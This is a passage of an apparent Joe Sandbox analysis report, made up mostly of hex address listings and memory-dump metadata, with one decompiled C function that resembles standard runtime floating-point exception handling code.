                                                                                                                                                                          0x00a001d3
                                                                                                                                                                          0x00a001d3
                                                                                                                                                                          0x00a001d6
                                                                                                                                                                          0x00a001d8
                                                                                                                                                                          0x00a001da
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a001dc
                                                                                                                                                                          0x00a001dd
                                                                                                                                                                          0x00a001e0
                                                                                                                                                                          0x00a001e3
                                                                                                                                                                          0x00a001e5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a001e7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a001e7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a001e5
                                                                                                                                                                          0x00a001e9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a001e9
                                                                                                                                                                          0x00a001ec
                                                                                                                                                                          0x00a001ec
                                                                                                                                                                          0x00a001ee
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a001f4
                                                                                                                                                                          0x00a001f4
                                                                                                                                                                          0x00a001f7
                                                                                                                                                                          0x00a001fa
                                                                                                                                                                          0x00a001fd
                                                                                                                                                                          0x00a001fd
                                                                                                                                                                          0x00a00201
                                                                                                                                                                          0x00a00204
                                                                                                                                                                          0x00a00207
                                                                                                                                                                          0x00a0020a
                                                                                                                                                                          0x00a00215
                                                                                                                                                                          0x00a0020c
                                                                                                                                                                          0x00a00211
                                                                                                                                                                          0x00a00211
                                                                                                                                                                          0x00a0021f
                                                                                                                                                                          0x00a00224
                                                                                                                                                                          0x00a00227
                                                                                                                                                                          0x00a00229
                                                                                                                                                                          0x00a00232
                                                                                                                                                                          0x00a00234
                                                                                                                                                                          0x00a0023b
                                                                                                                                                                          0x00a0023e
                                                                                                                                                                          0x00a00241
                                                                                                                                                                          0x00a00249
                                                                                                                                                                          0x00a0024f
                                                                                                                                                                          0x00a0024f
                                                                                                                                                                          0x00a0024f
                                                                                                                                                                          0x00a0024f
                                                                                                                                                                          0x00a00241
                                                                                                                                                                          0x00a00252
                                                                                                                                                                          0x00a00254
                                                                                                                                                                          0x00a0025b
                                                                                                                                                                          0x00a0025b
                                                                                                                                                                          0x00a0025e
                                                                                                                                                                          0x00a00261
                                                                                                                                                                          0x00a00267
                                                                                                                                                                          0x00a0026a
                                                                                                                                                                          0x00a0026d
                                                                                                                                                                          0x00a00276
                                                                                                                                                                          0x00a0027c
                                                                                                                                                                          0x00a0027f
                                                                                                                                                                          0x00a00282
                                                                                                                                                                          0x00a00282
                                                                                                                                                                          0x00a00285
                                                                                                                                                                          0x00a0028c
                                                                                                                                                                          0x00a0028c
                                                                                                                                                                          0x00a00287
                                                                                                                                                                          0x00a00287
                                                                                                                                                                          0x00a00287
                                                                                                                                                                          0x00a0028e
                                                                                                                                                                          0x00a00291
                                                                                                                                                                          0x00a00293
                                                                                                                                                                          0x00a00296
                                                                                                                                                                          0x00a0029d
                                                                                                                                                                          0x00a002a0
                                                                                                                                                                          0x00a002a3
                                                                                                                                                                          0x00a002a5
                                                                                                                                                                          0x00a002b0
                                                                                                                                                                          0x00a002b3
                                                                                                                                                                          0x00a002b8
                                                                                                                                                                          0x00a002bd
                                                                                                                                                                          0x00a002c4
                                                                                                                                                                          0x00a002c9
                                                                                                                                                                          0x00a002cb
                                                                                                                                                                          0x00a002cd
                                                                                                                                                                          0x00a002d1
                                                                                                                                                                          0x00a002d4
                                                                                                                                                                          0x00a002d7
                                                                                                                                                                          0x00a002df
                                                                                                                                                                          0x00a002e8
                                                                                                                                                                          0x00a002e8
                                                                                                                                                                          0x00a002ea
                                                                                                                                                                          0x00a002ed
                                                                                                                                                                          0x00a002ed
                                                                                                                                                                          0x00a002d7
                                                                                                                                                                          0x00a002f0
                                                                                                                                                                          0x00a002f8
                                                                                                                                                                          0x00a002fd
                                                                                                                                                                          0x00a00302
                                                                                                                                                                          0x00a00304
                                                                                                                                                                          0x00a00306
                                                                                                                                                                          0x00a00308
                                                                                                                                                                          0x00a0030b
                                                                                                                                                                          0x00a0030e
                                                                                                                                                                          0x00a00310
                                                                                                                                                                          0x00a00313
                                                                                                                                                                          0x00a00316
                                                                                                                                                                          0x00a00319
                                                                                                                                                                          0x00a0031b
                                                                                                                                                                          0x00a00322
                                                                                                                                                                          0x00a00327
                                                                                                                                                                          0x00a0032a
                                                                                                                                                                          0x00a00334
                                                                                                                                                                          0x00a00336
                                                                                                                                                                          0x00a00338
                                                                                                                                                                          0x00a0033b
                                                                                                                                                                          0x00a0033b
                                                                                                                                                                          0x00a0033d
                                                                                                                                                                          0x00a00340
                                                                                                                                                                          0x00a00343
                                                                                                                                                                          0x00a00346
                                                                                                                                                                          0x00a00349
                                                                                                                                                                          0x00a0031d
                                                                                                                                                                          0x00a0031d
                                                                                                                                                                          0x00a00320
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00320
                                                                                                                                                                          0x00a0034c
                                                                                                                                                                          0x00a0034e
                                                                                                                                                                          0x00a00350
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00352
                                                                                                                                                                          0x00a00352
                                                                                                                                                                          0x00a00355
                                                                                                                                                                          0x00a00357
                                                                                                                                                                          0x00a00357
                                                                                                                                                                          0x00a00365
                                                                                                                                                                          0x00a00368
                                                                                                                                                                          0x00a0036d
                                                                                                                                                                          0x00a0036f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00371
                                                                                                                                                                          0x00a00378
                                                                                                                                                                          0x00a00378
                                                                                                                                                                          0x00a0037b
                                                                                                                                                                          0x00a0037e
                                                                                                                                                                          0x00a00381
                                                                                                                                                                          0x00a00384
                                                                                                                                                                          0x00a00384
                                                                                                                                                                          0x00a00387
                                                                                                                                                                          0x00a0038a
                                                                                                                                                                          0x00a0038e
                                                                                                                                                                          0x00a00391
                                                                                                                                                                          0x00a00393
                                                                                                                                                                          0x00a00396
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00398
                                                                                                                                                                          0x00a00396
                                                                                                                                                                          0x00a00373
                                                                                                                                                                          0x00a00373
                                                                                                                                                                          0x00a00376
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00376
                                                                                                                                                                          0x00a0039d
                                                                                                                                                                          0x00a0039d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0039d
                                                                                                                                                                          0x00a0039a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0039a
                                                                                                                                                                          0x00a00355
                                                                                                                                                                          0x00a00350
                                                                                                                                                                          0x00a003a0
                                                                                                                                                                          0x00a003a0
                                                                                                                                                                          0x00a003a2
                                                                                                                                                                          0x00a003ac
                                                                                                                                                                          0x00a003ac
                                                                                                                                                                          0x00a003af
                                                                                                                                                                          0x00a003b1
                                                                                                                                                                          0x00a003b3
                                                                                                                                                                          0x00a003b5
                                                                                                                                                                          0x00a003ba
                                                                                                                                                                          0x00a003bd
                                                                                                                                                                          0x00a003bd
                                                                                                                                                                          0x00a003c0
                                                                                                                                                                          0x00a003c3
                                                                                                                                                                          0x00a003c6
                                                                                                                                                                          0x00a003c8
                                                                                                                                                                          0x00a003dd
                                                                                                                                                                          0x00a003df
                                                                                                                                                                          0x00a003e1
                                                                                                                                                                          0x00a003e3
                                                                                                                                                                          0x00a003e5
                                                                                                                                                                          0x00a003e7
                                                                                                                                                                          0x00a003e9
                                                                                                                                                                          0x00a003eb
                                                                                                                                                                          0x00a003ee
                                                                                                                                                                          0x00a003ee
                                                                                                                                                                          0x00a003f2
                                                                                                                                                                          0x00a003f4
                                                                                                                                                                          0x00a003fa
                                                                                                                                                                          0x00a003fd
                                                                                                                                                                          0x00a003fd
                                                                                                                                                                          0x00a003fd
                                                                                                                                                                          0x00a00401
                                                                                                                                                                          0x00a00401
                                                                                                                                                                          0x00a00406
                                                                                                                                                                          0x00a00409
                                                                                                                                                                          0x00a00409
                                                                                                                                                                          0x00a0040e
                                                                                                                                                                          0x00a00410
                                                                                                                                                                          0x00a00412
                                                                                                                                                                          0x00a00419
                                                                                                                                                                          0x00a00419
                                                                                                                                                                          0x00a0041b
                                                                                                                                                                          0x00a00420
                                                                                                                                                                          0x00a00422
                                                                                                                                                                          0x00a00425
                                                                                                                                                                          0x00a00425
                                                                                                                                                                          0x00a00428
                                                                                                                                                                          0x00a00430
                                                                                                                                                                          0x00a00430
                                                                                                                                                                          0x00a00432
                                                                                                                                                                          0x00a00432
                                                                                                                                                                          0x00a00437
                                                                                                                                                                          0x00a0043d
                                                                                                                                                                          0x00a00441
                                                                                                                                                                          0x00a00444
                                                                                                                                                                          0x00a00447
                                                                                                                                                                          0x00a00449
                                                                                                                                                                          0x00a00449
                                                                                                                                                                          0x00a00449
                                                                                                                                                                          0x00a0044e
                                                                                                                                                                          0x00a0044e
                                                                                                                                                                          0x00a00451
                                                                                                                                                                          0x00a00454
                                                                                                                                                                          0x00a00414
                                                                                                                                                                          0x00a00414
                                                                                                                                                                          0x00a00417
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00417
                                                                                                                                                                          0x00a00412
                                                                                                                                                                          0x00a0045b
                                                                                                                                                                          0x00a0045b
                                                                                                                                                                          0x00a0045c
                                                                                                                                                                          0x00a003a4
                                                                                                                                                                          0x00a003a4
                                                                                                                                                                          0x00a003a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a003a6
                                                                                                                                                                          0x00a0045f
                                                                                                                                                                          0x00a0046c
                                                                                                                                                                          0x00a0046f
                                                                                                                                                                          0x00a00472
                                                                                                                                                                          0x00a00476
                                                                                                                                                                          0x00a00477
                                                                                                                                                                          0x00a0047a
                                                                                                                                                                          0x00a0047d
                                                                                                                                                                          0x00a00483
                                                                                                                                                                          0x00a00484
                                                                                                                                                                          0x00a00487
                                                                                                                                                                          0x00a0048a
                                                                                                                                                                          0x00a0048d
                                                                                                                                                                          0x00a0048d
                                                                                                                                                                          0x00a00282
                                                                                                                                                                          0x00a00498
                                                                                                                                                                          0x00a0049b
                                                                                                                                                                          0x00a0049c
                                                                                                                                                                          0x00a0049e
                                                                                                                                                                          0x00a004a0
                                                                                                                                                                          0x00a004a5
                                                                                                                                                                          0x00a004b0
                                                                                                                                                                          0x00a004b0
                                                                                                                                                                          0x00a004b6
                                                                                                                                                                          0x00a004b9
                                                                                                                                                                          0x00a004ba
                                                                                                                                                                          0x00a004ba
                                                                                                                                                                          0x00a004b0
                                                                                                                                                                          0x00a004be
                                                                                                                                                                          0x00a004c0
                                                                                                                                                                          0x00a004c2
                                                                                                                                                                          0x00a004c4
                                                                                                                                                                          0x00a004c4
                                                                                                                                                                          0x00a004c8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a004ca
                                                                                                                                                                          0x00a004ca
                                                                                                                                                                          0x00a004cd
                                                                                                                                                                          0x00a004cf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a004cf
                                                                                                                                                                          0x00a004c4
                                                                                                                                                                          0x00a004d1
                                                                                                                                                                          0x00a004dc
                                                                                                                                                                          0x00a004dc
                                                                                                                                                                          0x00a001ee
                                                                                                                                                                          0x00a0008c
                                                                                                                                                                          0x00a0008c
                                                                                                                                                                          0x00a0008c
                                                                                                                                                                          0x00a0008f
                                                                                                                                                                          0x00a00095
                                                                                                                                                                          0x00a000c6
                                                                                                                                                                          0x00a000c8
                                                                                                                                                                          0x00a0010a
                                                                                                                                                                          0x00a0010c
                                                                                                                                                                          0x00a00113
                                                                                                                                                                          0x00a0011a
                                                                                                                                                                          0x00a0011d
                                                                                                                                                                          0x00a00120
                                                                                                                                                                          0x00a00122
                                                                                                                                                                          0x00a00122
                                                                                                                                                                          0x00a00123
                                                                                                                                                                          0x00a00126
                                                                                                                                                                          0x00a00130
                                                                                                                                                                          0x00a0013a
                                                                                                                                                                          0x00a0013f
                                                                                                                                                                          0x00a00142
                                                                                                                                                                          0x00a00144
                                                                                                                                                                          0x00a00147
                                                                                                                                                                          0x00a00150
                                                                                                                                                                          0x00a00153
                                                                                                                                                                          0x00a00156
                                                                                                                                                                          0x00a00159
                                                                                                                                                                          0x00a0015f
                                                                                                                                                                          0x00a00162
                                                                                                                                                                          0x00a00165
                                                                                                                                                                          0x00a00165
                                                                                                                                                                          0x00a00165
                                                                                                                                                                          0x00a0016a
                                                                                                                                                                          0x00a0016a
                                                                                                                                                                          0x00a00175
                                                                                                                                                                          0x00a00180
                                                                                                                                                                          0x00a00183
                                                                                                                                                                          0x00a0018f
                                                                                                                                                                          0x00a00194
                                                                                                                                                                          0x00a0019f
                                                                                                                                                                          0x00a001a1
                                                                                                                                                                          0x00a001a3
                                                                                                                                                                          0x00a001a9
                                                                                                                                                                          0x00a001ae
                                                                                                                                                                          0x00a001b0
                                                                                                                                                                          0x00a001b6
                                                                                                                                                                          0x00a000ca
                                                                                                                                                                          0x00a000d5
                                                                                                                                                                          0x00a000d8
                                                                                                                                                                          0x00a000e4
                                                                                                                                                                          0x00a000e6
                                                                                                                                                                          0x00a000ed
                                                                                                                                                                          0x00a000ef
                                                                                                                                                                          0x00a000f7
                                                                                                                                                                          0x00a000f9
                                                                                                                                                                          0x00a000fb
                                                                                                                                                                          0x00a00100
                                                                                                                                                                          0x00a00103
                                                                                                                                                                          0x00a00109
                                                                                                                                                                          0x00a00109
                                                                                                                                                                          0x00a00097
                                                                                                                                                                          0x00a000a5
                                                                                                                                                                          0x00a000b1
                                                                                                                                                                          0x00a000b3
                                                                                                                                                                          0x00a000c5
                                                                                                                                                                          0x00a000c5
                                                                                                                                                                          0x00a00095
                                                                                                                                                                          0x00a00086
                                                                                                                                                                          0x00a00075

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a1092e6019f5d72651b5277bdddd2d04a9f9ab62104a009dd5110edd46915678
                                                                                                                                                                          • Instruction ID: 72b1bd250d8075cc1a89d6517255a57905c48bdac716723f75eb028603684445
                                                                                                                                                                          • Opcode Fuzzy Hash: a1092e6019f5d72651b5277bdddd2d04a9f9ab62104a009dd5110edd46915678
                                                                                                                                                                          • Instruction Fuzzy Hash: 77F14E71E012199FDF14CFA9D880BAEB7B1FF88314F158269D919AB385D731AE01CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A047D9 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODECrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A047D9(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00A04E0F(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E00A04D7B(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}
























                                                                                                                                                                          0x00a047e7
                                                                                                                                                                          0x00a047ee
                                                                                                                                                                          0x00a047f3
                                                                                                                                                                          0x00a047f9
                                                                                                                                                                          0x00a047fc
                                                                                                                                                                          0x00a04802
                                                                                                                                                                          0x00a04807
                                                                                                                                                                          0x00a0480c
                                                                                                                                                                          0x00a0480c
                                                                                                                                                                          0x00a04812
                                                                                                                                                                          0x00a04817
                                                                                                                                                                          0x00a0481c
                                                                                                                                                                          0x00a0481c
                                                                                                                                                                          0x00a04823
                                                                                                                                                                          0x00a04828
                                                                                                                                                                          0x00a0482d
                                                                                                                                                                          0x00a0482d
                                                                                                                                                                          0x00a04834
                                                                                                                                                                          0x00a04839
                                                                                                                                                                          0x00a0483e
                                                                                                                                                                          0x00a0483e
                                                                                                                                                                          0x00a04845
                                                                                                                                                                          0x00a0484a
                                                                                                                                                                          0x00a0484f
                                                                                                                                                                          0x00a0484f
                                                                                                                                                                          0x00a04857
                                                                                                                                                                          0x00a04867
                                                                                                                                                                          0x00a04879
                                                                                                                                                                          0x00a0488b
                                                                                                                                                                          0x00a0489e
                                                                                                                                                                          0x00a048b0
                                                                                                                                                                          0x00a048b8
                                                                                                                                                                          0x00a048bd
                                                                                                                                                                          0x00a048c2
                                                                                                                                                                          0x00a048c2
                                                                                                                                                                          0x00a048c9
                                                                                                                                                                          0x00a048ce
                                                                                                                                                                          0x00a048ce
                                                                                                                                                                          0x00a048d5
                                                                                                                                                                          0x00a048da
                                                                                                                                                                          0x00a048da
                                                                                                                                                                          0x00a048e1
                                                                                                                                                                          0x00a048e6
                                                                                                                                                                          0x00a048e6
                                                                                                                                                                          0x00a048ed
                                                                                                                                                                          0x00a048f2
                                                                                                                                                                          0x00a048f2
                                                                                                                                                                          0x00a048fc
                                                                                                                                                                          0x00a048fe
                                                                                                                                                                          0x00a04938
                                                                                                                                                                          0x00a04900
                                                                                                                                                                          0x00a04905
                                                                                                                                                                          0x00a04929
                                                                                                                                                                          0x00a04931
                                                                                                                                                                          0x00a04925
                                                                                                                                                                          0x00a04925
                                                                                                                                                                          0x00a0493b
                                                                                                                                                                          0x00a04942
                                                                                                                                                                          0x00a04944
                                                                                                                                                                          0x00a04966
                                                                                                                                                                          0x00a0496e
                                                                                                                                                                          0x00a04971
                                                                                                                                                                          0x00a04971
                                                                                                                                                                          0x00a04973
                                                                                                                                                                          0x00a04973
                                                                                                                                                                          0x00a0497e
                                                                                                                                                                          0x00a04984
                                                                                                                                                                          0x00a04989
                                                                                                                                                                          0x00a04990
                                                                                                                                                                          0x00a049ca
                                                                                                                                                                          0x00a049d5
                                                                                                                                                                          0x00a049db
                                                                                                                                                                          0x00a049de
                                                                                                                                                                          0x00a049e1
                                                                                                                                                                          0x00a049ed
                                                                                                                                                                          0x00a049f5
                                                                                                                                                                          0x00a04992
                                                                                                                                                                          0x00a04995
                                                                                                                                                                          0x00a049a1
                                                                                                                                                                          0x00a049a7
                                                                                                                                                                          0x00a049ad
                                                                                                                                                                          0x00a049b0
                                                                                                                                                                          0x00a049b9
                                                                                                                                                                          0x00a049b9
                                                                                                                                                                          0x00a049f8
                                                                                                                                                                          0x00a04a06
                                                                                                                                                                          0x00a04a0c
                                                                                                                                                                          0x00a04a0f
                                                                                                                                                                          0x00a04a14
                                                                                                                                                                          0x00a04a16
                                                                                                                                                                          0x00a04a19
                                                                                                                                                                          0x00a04a19
                                                                                                                                                                          0x00a04a1e
                                                                                                                                                                          0x00a04a20
                                                                                                                                                                          0x00a04a23
                                                                                                                                                                          0x00a04a23
                                                                                                                                                                          0x00a04a28
                                                                                                                                                                          0x00a04a2a
                                                                                                                                                                          0x00a04a2d
                                                                                                                                                                          0x00a04a2d
                                                                                                                                                                          0x00a04a32
                                                                                                                                                                          0x00a04a34
                                                                                                                                                                          0x00a04a37
                                                                                                                                                                          0x00a04a37
                                                                                                                                                                          0x00a04a3c
                                                                                                                                                                          0x00a04a3e
                                                                                                                                                                          0x00a04a3e
                                                                                                                                                                          0x00a04a4b
                                                                                                                                                                          0x00a04a4e
                                                                                                                                                                          0x00a04a85
                                                                                                                                                                          0x00a04a50
                                                                                                                                                                          0x00a04a50
                                                                                                                                                                          0x00a04a53
                                                                                                                                                                          0x00a04a7e
                                                                                                                                                                          0x00a04a73
                                                                                                                                                                          0x00a04a73
                                                                                                                                                                          0x00a04a87
                                                                                                                                                                          0x00a04a8f
                                                                                                                                                                          0x00a04a92
                                                                                                                                                                          0x00a04ab1
                                                                                                                                                                          0x00a04ab6
                                                                                                                                                                          0x00a04ab6
                                                                                                                                                                          0x00a04ab8
                                                                                                                                                                          0x00a04abd
                                                                                                                                                                          0x00a04ac9
                                                                                                                                                                          0x00a04abf
                                                                                                                                                                          0x00a04ac2
                                                                                                                                                                          0x00a04ac2
                                                                                                                                                                          0x00a04ace
                                                                                                                                                                          0x00a04ace
                                                                                                                                                                          0x00a04a94
                                                                                                                                                                          0x00a04a97
                                                                                                                                                                          0x00a04aa6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04aa6
                                                                                                                                                                          0x00a04a99
                                                                                                                                                                          0x00a04a9c
                                                                                                                                                                          0x00a04a9e
                                                                                                                                                                          0x00a04a9e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04a9c
                                                                                                                                                                          0x00a04a55
                                                                                                                                                                          0x00a04a58
                                                                                                                                                                          0x00a04a6e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04a6e
                                                                                                                                                                          0x00a04a5d
                                                                                                                                                                          0x00a04a5f
                                                                                                                                                                          0x00a04a5f
                                                                                                                                                                          0x00a04a5d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04a4e
                                                                                                                                                                          0x00a0494b
                                                                                                                                                                          0x00a04959
                                                                                                                                                                          0x00a04961
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04961
                                                                                                                                                                          0x00a0494f
                                                                                                                                                                          0x00a04954
                                                                                                                                                                          0x00a04954
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0494f
                                                                                                                                                                          0x00a0490c
                                                                                                                                                                          0x00a0491a
                                                                                                                                                                          0x00a04922
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04922
                                                                                                                                                                          0x00a04910
                                                                                                                                                                          0x00a04915
                                                                                                                                                                          0x00a04915
                                                                                                                                                                          0x00a04910

                                                                                                                                                                          APIs
                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00A04A06
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
